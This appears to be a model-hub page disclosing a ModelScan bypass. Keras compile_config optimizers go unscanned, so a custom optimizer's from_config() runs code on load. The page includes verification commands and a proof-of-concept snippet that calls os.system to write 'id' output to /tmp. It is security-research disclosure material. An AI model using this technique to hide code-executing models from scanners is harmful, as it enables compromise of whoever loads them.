ModelScan compile_config Bypass — Optimizer from_config RCE

What This Is

ModelScan's Keras scanners only check Lambda layers (class_name == "Lambda"). The compile_config section — containing optimizer, loss, and metrics configurations — is completely ignored.

This .keras file contains a custom optimizer (MyOpt>BadOptimizer) with a malicious from_config() method. ModelScan reports 0 Issues, 0 Errors, 0 Skipped. When loaded, the optimizer's from_config() executes arbitrary code.

Verify

# 1. ModelScan says CLEAN
modelscan -p model.keras
# Output: Issues: 0, Errors: 0, Skipped: 0

# 2. Inspect compile_config — optimizer is custom class
python3 -c "
import zipfile, json
with zipfile.ZipFile('model.keras') as zf:
    c = json.load(zf.open('config.json'))
    opt = c['compile_config']['optimizer']
    print(f'class_name: {opt[\"class_name\"]}')
    print(f'registered_name: {opt[\"registered_name\"]}')
"

# 3. Load → from_config → RCE
python3 -c "
import tensorflow as tf, keras, os
@keras.saving.register_keras_serializable(package='MyOpt')
class BadOptimizer(tf.keras.optimizers.Adam):
    @classmethod
    def from_config(cls, config):
        import os; os.system('id > /tmp/COMPILE_CONFIG_RCE')
        return super().from_config(config)
model = tf.keras.models.load_model('model.keras', safe_mode=False)
print('RCE file created:', os.path.exists('/tmp/COMPILE_CONFIG_RCE'))
"

Attack Vector

ModelScan scans layers but ignores compile_config. Custom optimizer, loss, and metric classes can all carry malicious from_config() payloads that execute during load_model().

Affected Formats

.keras (Keras Native)
.h5 (HDF5)

Disclosure

Submitted to ProtectAI via huntr.dev.

Downloads last month: 15

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support